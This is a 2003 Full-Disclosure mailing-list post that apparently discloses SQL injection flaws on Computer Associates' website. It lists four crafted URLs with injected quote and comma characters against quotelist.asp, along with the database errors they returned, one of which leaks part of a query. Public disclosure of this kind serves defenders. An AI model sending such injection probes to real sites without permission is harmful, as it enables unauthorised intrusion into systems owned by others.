Errata: Computer Associates site vulnerable

From: Sir Mordred (mordred[at]s-mail.com)
To: full-disclosure[at]lists.netsys.com
Date: Wed, 07 May 2003 15:47:00 +0000
Subject: [Full-Disclosure] @(#)Mordred Labs security notice - exploring the security companies

// @(#)Mordred Labs security notice 0x0002

Name: Exploring the security companies (part one)
Release date: May 7, 2003
Author: Sir Mordred (mordred@s-mail.com)

I. INTRODUCTION

This is a first part of security notice about security companies.
I'd split the original notice because of the amount information contained
in it.
The main topic of this notice is "bad coding habits", next time maybe we
will talk about security audit and the source code audit in particular.

Also i should say - somehow i fell respect to people, who are doing
security and brave enough to build a website with a dynamic content, not 
just a couple of html pages. But sometimes crazy thought crosses my mind - 
maybe it is just a dumb honeypot? :-)

The format for vulnerabilities is:

number) [hostname, the company name]
quotes, comments (if exists)
* ISSUE (number) - description of the vulnerability
blank line
comments (if exists)
blank line
the url to demonstrate this vulnerability
blank line
the error message (if exists)

II. DETAILS

Now lets begin from the rather interesting security company  "e-matters",
and a couple of minutes brings us a several nice issues:


[snip...]


2) [ www.ca.com, Computer Associates ]

CA is a $3 billion revenue enterprise software company, providing
business-critical technology 
that serves as the backbone of commerce and shapes the way business is
conducted throughout the world.


* ISSUE 1 - SQL injection in /quotes/quotelist.asp page

http://www3.ca.com/quotes/quotelist.asp?AT=1,'1&SOL=1&AR=&CP=

Microsoft OLE DB Provider for SQL Server error '80040e14'

Line 1: Incorrect syntax near ','.
/common/include/caADO.asp, line 243

* ISSUE 2 - Another SQL injection in /qoutes/quotelist.asp page

http://www3.ca.com/quotes/quotelist.asp?AT=1&SOL=1,1&AR=&CP=

Microsoft OLE DB Provider for SQL Server error '80040e14'
Line 1: Incorrect syntax near '1'.
/common/include/caADO.asp, line 243

* ISSUE 3 - Another SQL injection in /quotes/quotelist.asp page

http://www3.ca.com/quotes/quotelist.asp?AT=1&SOL=1&AR=&CP=,'

Microsoft OLE DB Provider for SQL Server error '80040e14'
Line 1: Incorrect syntax near ','.
/common/include/caADO.asp, line 243

* ISSUE 4 - Yet another SQL injection in /quotes/quotelist.asp page

http://www3.ca.com/quotes/quotelist.asp?AT=1&SOL=1&AR='88&CP=20099

Microsoft OLE DB Provider for SQL Server error '80040e14'
Unclosed quotation mark before the character string '88)) AND q.FKComp_ID =
20099 ORDER BY co.Comp_Name, Quotes_Date DESC'.
/common/include/caADO.asp, line 243